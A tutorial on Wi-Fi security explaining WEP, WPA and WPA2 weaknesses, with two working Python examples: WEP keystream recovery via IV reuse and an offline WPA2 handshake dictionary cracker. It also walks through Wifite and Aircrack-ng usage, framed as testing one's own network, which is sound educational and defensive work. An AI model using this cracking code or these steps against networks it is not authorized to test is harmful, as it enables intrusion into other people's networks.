With this guide, the tools shown and the recommended hardware, you can recover the password of most weakly secured WLANs, and above all find out whether your own WLAN is one of them.
In Hollywood movies it looks easy and quick: the cracking of other people's WiFi networks. A fast-typing person sits at a laptop, and one network name after another appears on the dark screen in green lettering, each with its password. But what does reality look like?
Behind the abbreviation WLAN (in English also often simply Wi-Fi) stand the words "Wireless Local Area Network", which, as the name suggests, means a wireless local radio network. It is used wherever data transmission via cable would be impossible or would require a great deal of effort, or simply for convenience within your own four walls.
For precisely these two reasons, WLANs are indispensable today. When searching for your home WLAN, you may see a long list of other people's networks, which, especially in densely populated areas, can have identical names.
Identical WiFi names are not a problem for a computer, since it does not distinguish network devices by name but by their so-called MAC addresses (Media Access Control addresses); we humans find it somewhat harder.
But what is a MAC address again?
A MAC address is the hardware address of a network interface (e.g. a WLAN stick, the WLAN chip integrated in a notebook, or a wired LAN port) and serves as an identifier for a network-capable device. Its use is not limited to wireless LAN; it is also used for wired (LAN) transmission. Note that a MAC address can be changed in software on almost any adapter, so it identifies a device but does not authenticate it.
SSID / ESSID
So that we, as normal users, can distinguish between these many WLANs, it is possible to change the default name of your WLAN router or network as you wish. This name is called the SSID (Service Set Identifier) in expert circles and will come up frequently in the following, so remember it well.
Now you know the basic terminology for our topic. Let us take a small step deeper into the subject: security.
Most WiFi networks are not freely accessible and are secured with a network key. Three security standards are in use, and they differ greatly in how hard they are to crack.
The following table shows the three common security standards with their associated encryption algorithms:

Standard   Algorithm            Secure?
WEP        RC4                  no
WPA        TKIP (RC4-based)     kind of, but no
WPA2       CCMP (AES-based)     yes, if the passphrase is strong
WEP
This is the most insecure of the three security standards and uses the RC4 stream cipher in a way that is easily broken. Networks using it can be cracked with little effort and in a short time. One reason is that a single static key is used for all frames, and it is only 40 or 104 bits long (marketed as "64-bit" and "128-bit" WEP, the difference being the 24-bit initialization vector, IV, that is sent in the clear with every frame). Because the IV space is so small, the same RC4 keystream is reused after a few thousand frames on a busy network, and frames whose content is partly known (known-plaintext attacks) then reveal the keystream, and with enough frames the key itself.
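The following is an added example, not code from the original article, that shows the WEP weakness just described in working code: the secret key, the IV and the two frames are constructed locally, the CRC-32 integrity value that real WEP appends is omitted, and the attack shown is keystream reuse through an IV collision rather than the full PTW key-recovery attack that aircrack-ng performs.

```python
# Added example, not part of the original article: why a static RC4 key plus
# a 24-bit IV makes WEP breakable.  Key, IV and frames below are constructed.

def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key scheduling, then generate `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # KSA
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:                  # PRGA
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings; the result is as long as the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(secret_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP seeds RC4 with IV || secret key and sends the IV in the clear.
    The CRC-32 ICV that real WEP appends is omitted here."""
    assert len(iv) == 3, "WEP IVs are 24 bits"
    return iv + xor(plaintext, rc4_keystream(iv + secret_key, len(plaintext)))


# Known plaintext: every WEP data frame carrying IPv4 starts with this
# 8-byte LLC/SNAP header, so the first 8 keystream bytes are always exposed.
LLC_SNAP_IP = bytes.fromhex("aaaa030000000800")

SECRET_KEY = bytes.fromhex("0102030405")                 # constructed 40-bit key
IV = b"\x11\x22\x33"                                     # constructed IV
PLAIN_A = LLC_SNAP_IP + b"ARP who-has 10.0.0.1"          # a frame the attacker can predict
PLAIN_B = LLC_SNAP_IP + b"pw=hunter2"                     # the frame the attacker wants
FRAME_A = wep_encrypt(SECRET_KEY, IV, PLAIN_A)
FRAME_B = wep_encrypt(SECRET_KEY, IV, PLAIN_B)           # same IV: keystream reused


def keystream_from_known_prefix(frame: bytes, known_prefix: bytes) -> bytes:
    """Ciphertext XOR known plaintext = keystream for this IV at this
    position, without knowing the secret key at all."""
    return xor(frame[3:3 + len(known_prefix)], known_prefix)


def decrypt_prefix(frame: bytes, keystream: bytes) -> bytes:
    """Apply a recovered keystream to another frame that used the same IV."""
    return xor(frame[3:3 + len(keystream)], keystream)


def plaintext_via_iv_collision(frame_known: bytes, known_plaintext: bytes,
                               frame_target: bytes) -> bytes:
    """Two frames with the same IV: C_a XOR C_b = P_a XOR P_b, so knowing all
    of P_a (e.g. traffic the attacker provoked) yields all of P_b."""
    assert frame_known[:3] == frame_target[:3], "IV collision required"
    return xor(xor(frame_known[3:], frame_target[3:]), known_plaintext)


if __name__ == "__main__":
    ks = keystream_from_known_prefix(FRAME_A, LLC_SNAP_IP)
    print("keystream for IV", IV.hex(), "=", ks.hex())
    print("header of frame B:", decrypt_prefix(FRAME_B, ks).hex())
    print("payload of frame B:", plaintext_via_iv_collision(FRAME_A, PLAIN_A, FRAME_B))
```

With only 2^24 possible IVs, the birthday bound puts the first collision at roughly 5000 frames, and many WEP implementations reset the IV counter to zero on every reboot, which is why ARP replay (forcing the access point to emit thousands of frames with predictable content) is the standard way to speed the attack up.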
WPA & WPA2
WPA and WPA2 are the successors of WEP. WPA was an interim fix that kept RC4 but wrapped it in TKIP (per-packet key mixing plus a message integrity check); WPA2 replaced RC4 entirely with CCMP, which is built on the Advanced Encryption Standard (AES) and is considered "unbreakable" in practice. The 256 bits often quoted are the length of the Pairwise Master Key that router and client derive from the passphrase and the SSID; the AES key that actually encrypts traffic is 128 bits. The word "unbreakable" refers only to the algorithm itself and not to the password defined by the user.
If the chosen password is too short or too simple, it can be guessed easily and automatically by a computer in a so-called brute-force attack, in which the computer tries all possible combinations of letters, numbers and special characters on its own. Ready-made word lists (dictionary attacks) can be used in the same way. The attacker does not even have to try the guesses against the router: it is enough to capture the four-way handshake that is exchanged whenever a client connects (or is kicked off and reconnects), after which every candidate password can be checked offline, as fast as the attacker's hardware allows. Each guess costs 4096 rounds of HMAC-SHA1, which is deliberately slow, but a modern graphics card still tests hundreds of thousands of candidates per second. This trial and error takes its time, and the rule of thumb holds: the longer and more complex the password, the longer the attack takes, and beyond a certain length and complexity it becomes infeasible. In practice, however, a hard password is the exception, as many users prefer the convenience of a short, easy-to-remember one. Unfortunately.
From the attacker's point of view, the better the hardware used to crack and the weaker the obstacles, the more efficient and faster the attack.
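The offline attack described above, as an added example that is not part of the original article: the SSID, MAC addresses, nonces and the EAPOL-Key frame are constructed locally so the example runs without a real capture (in practice they come from a handshake saved by airodump-ng or Wifite), and the RSN information element that a real message 2 carries in its key data is omitted. The key derivation itself (PBKDF2 to the PMK, PRF-512 to the PTK, MIC over the EAPOL frame) is the one defined in IEEE 802.11i, and the first test vector below is the standard's own.

```python
# Added example, not part of the original article: how a captured WPA2-PSK
# four-way handshake is cracked offline.  SSID, MACs, nonces and the EAPOL
# frame below are constructed so that the example runs without a capture.
import hashlib
import hmac
from typing import Iterable, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    This is the slow step, and the only one that depends on the guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 from 802.11i: expand the PMK with both MACs and both nonces."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return ptk[:64]            # KCK = ptk[:16], KEK = ptk[16:32], TK = ptk[32:48]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes, key_descriptor_version: int = 2) -> bytes:
    """MIC over the whole EAPOL-Key frame with its MIC field zeroed.
    Version 1 (WPA/TKIP) uses HMAC-MD5; version 2 (WPA2/CCMP) HMAC-SHA1 cut to 16 bytes."""
    if key_descriptor_version == 1:
        return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.md5).digest()
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP) with the MIC field zeroed.
    Field layout follows 802.11i; the RSN IE in the key data is omitted."""
    body = (
        b"\x02"                            # descriptor type: RSN
        + (0x010A).to_bytes(2, "big")      # key info: version 2, pairwise, MIC present
        + (16).to_bytes(2, "big")          # key length
        + (1).to_bytes(8, "big")           # replay counter
        + snonce                           # key nonce (SNonce)
        + bytes(16) + bytes(8) + bytes(8)  # key IV, key RSC, reserved
        + bytes(16)                        # key MIC, zero while computing (offset 81)
        + (0).to_bytes(2, "big")           # key data length
    )
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v2, type Key


# Constructed "capture": what airodump-ng would hand you for a test network.
SSID = "TestNet-Home"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))


def make_capture(real_passphrase: str) -> dict:
    """Simulate a client joining with `real_passphrase`; returns the material an
    attacker can sniff (everything except the passphrase itself)."""
    pmk = pmk_from_passphrase(real_passphrase, SSID)
    kck = ptk_from_pmk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    eapol = build_eapol_msg2(SNONCE)
    return {"ssid": SSID, "ap": AP_MAC, "sta": STA_MAC, "anonce": ANONCE,
            "snonce": SNONCE, "eapol": eapol, "mic": eapol_mic(kck, eapol)}


def crack_handshake(cap: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: recompute the MIC for each candidate and
    compare it with the sniffed one.  Returns the passphrase or None."""
    for candidate in wordlist:
        candidate = candidate.strip()
        if not 8 <= len(candidate) <= 63:          # WPA passphrase length rule
            continue
        pmk = pmk_from_passphrase(candidate, cap["ssid"])
        kck = ptk_from_pmk(pmk, cap["ap"], cap["sta"], cap["anonce"], cap["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, cap["eapol"]), cap["mic"]):
            return candidate
    return None


if __name__ == "__main__":
    capture = make_capture("sunshine2019")
    print(crack_handshake(capture, ["password", "12345678", "sunshine2019", "letmein1"]))
```

Note that the SSID is part of the PBKDF2 salt: the same passphrase yields a different PMK on every network name, which is why rainbow tables for WPA2 only exist for the most common default SSIDs, and why renaming your router away from the factory name costs an attacker those precomputed tables.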
WLAN hacking or WLAN pentesting
So far you have learned why it is so important to protect your own network from unauthorized access. But is your network really as secure as the manufacturer of your router promises? Is the password you chose really sufficient? The best way to find out is to test it!
The success of an attack on a WiFi network is largely determined by the hardware used, the chosen target and the distance to it, i.e. the received signal strength of the WLAN. These factors are among the most important, because most attack methods depend on traffic from the target network and on other users (clients) logging in: a WPA/WPA2 attack needs a captured client handshake, and a WEP attack needs enough frames with distinct IVs.
At this point many problems can occur and cause a lot of frustration.
To avoid this frustration when testing your WLAN, consider these factors from the beginning and choose one of the attacks introduced later accordingly.
What hardware should you use?
An underestimated point is the right hardware, more precisely the WLAN adapter.
In its normal state, a WLAN adapter only passes up the frames addressed to it. This is perfectly fine for normal operation, but it is nowhere near sufficient for WLAN testing, because for the attacks described here we have to pick up all the other frames sent between the target network and its users.
For this purpose the WLAN adapter must support so-called monitor mode and packet injection (on Kali Linux, airmon-ng switches an interface into monitor mode and aireplay-ng -9 checks whether injection works). It should also support a reasonably high data rate and, if the target network runs on 5 GHz, that band as well, since a 2.4 GHz-only adapter will not even see such a network.
In order to save you the long search for suitable WLAN adapters, I have put together some models for you below. This is not a paid product placement; it is an honest recommendation on my part.
- ALFA Network AWUS036NHA
- TP-Link Archer T2UH AC600
- ALFA Network AWUS036AC
What software can you use?
With Wifite you can crack WEP-, WPA- and WPA2-secured WiFi networks almost automatically. Operation is relatively simple and especially suitable for beginners. Another positive feature of this tool is that it detects routers with WPS enabled and attacks the WPS PIN, which is often much faster than attacking the WPA2 passphrase itself.
To start an attack with this tool in Kali Linux, first open a terminal and type the command: wifite
At this point you can also enter wifite -wep if you only want to search for networks using the WEP standard (the rewritten Wifite 2 spells this option --wep).
After executing one of the two commands, the tool starts to search for and list all WLANs within range. As soon as your test network appears in the list, you can stop the search by pressing Ctrl + C.
Now Wifite asks which of the listed networks should be attacked. Here you simply enter the number(s) of the respective network(s). It is also possible to select all networks from the list with "all", but you should only do this if they are all your own test networks.
Pressing Enter again starts the fully automatic cracking of the network keys, which are displayed in plain text if successful. With a little luck this process is completed within a few minutes, but it can also take many hours, which is usually the case. For WPA/WPA2 the quick part is capturing the handshake; how long the rest takes depends on how complex the password is, on the word list Wifite is given, and on how fast your hardware is.
Fern Wifi Cracker
Fern Wifi Cracker is also a tool that can attack all three security standards (WEP, WPA, WPA2). In addition, man-in-the-middle attacks and brute-force attacks are possible with this tool. Thanks to the program's clear graphical interface, it is relatively easy to use.
Aircrack-ng
With the Aircrack-ng suite you can analyze and exploit weak points in your WLAN, and also capture and evaluate frames (airodump-ng captures, aireplay-ng injects, aircrack-ng does the cracking). It can recover WEP keys and WPA/WPA2 passphrases. Aircrack-ng is, however, something for experienced users because of its wide range of options.
Even with this basic knowledge and the Wifite tool shown above, you will succeed in your first attack on your test network. To crack harder nuts, however, it is definitely worth taking a look at Aircrack-ng. Admittedly, this tool is a bit more complex than Wifite, but it convinces with its wide range of functions and the multitude of attack possibilities.